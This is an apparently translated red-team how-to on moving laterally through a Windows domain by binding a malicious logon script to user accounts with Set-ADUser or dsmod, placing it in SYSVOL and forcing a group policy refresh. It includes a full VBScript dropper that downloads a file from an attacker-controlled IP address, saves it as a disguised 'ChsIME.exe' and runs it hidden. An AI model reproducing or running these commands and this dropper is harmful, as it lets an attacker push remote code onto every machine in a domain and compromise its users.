Title: Login script issuance

0x1. Utilization scenario

When obtaining domain control permissions or domain admin and other high permissions, if you want to horizontally go to the PC host in the domain, the other party opens the firewall, and cannot use it horizontally through 445 and 135, you can obtain the target host permissions through the login script binding method.

0x2. Utilization method

Method 1: Powershell win2012 and above comes with it to obtain the current domain user information

Get-ADUser -Filter * -Properties * | sort LastLogonDate | select name,mail,DistinguishedName,LastLogonDate | Export-Csv -Path C:\Users\Public\Documents\user.csv -Encoding utf8

Bind the specified user

Set-ADUser -Identity zhangsan -ScriptPath 'download.vbs'

Unbind

Set-ADUser -Identity zhangsan -ScriptPath ' '

Method 2: Use dsmod for binding

dsmod user -loscr'download.vbs''CN=john,CN=Users,DC=redteam,DC=com'

Unbind

dsmod user -loscr '' 'CN=john,CN=Users,DC=redteam,DC=com'

Refresh group policy

shell gpupdate /force

VBS content

strFileURL='http://192.168.172.129:82/logo.ico'strHDLocation='C:\Users\Public\Documents\ChsIME.exe'Set objXMLHTTP=CreateObject('MSXML2.XMLHTTP')objXMLHTTP.open'GET', strFileURL, falseobjXMLHTTP.send()If objXMLHTTP.Status=200 ThenSet objADOStream=CreateObject('ADODB.Stream')objADOStream.OpenobjADOStream.Type=1 'adTypeBinaryobjADOStream.Write objXMLHTTP.ResponseBodyobjADOStream.Position=0'Set the stream position to the startSet objFSO=Createobject('Scripting.FileSystemObject')If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocationSet objFSO=NothingobjADOStream.SaveToFile strHDLocationobjADOStream.CloseSet objADOStream=NothingEndifSet objXMLHTTP=NothingstrComputer='.'setws=wscript.createobject('wscript.shell')val=ws.run ('C:\Users\Public\Documents\ChsIME.exe',0)

Upload to the directory dc c:\windows\SYSVOL\sysvol\redteam.com\SCRIPTS\, bind it through method one or two and refresh the group policy.

https://www.cnblogs.com/websecyw/p/16657762.html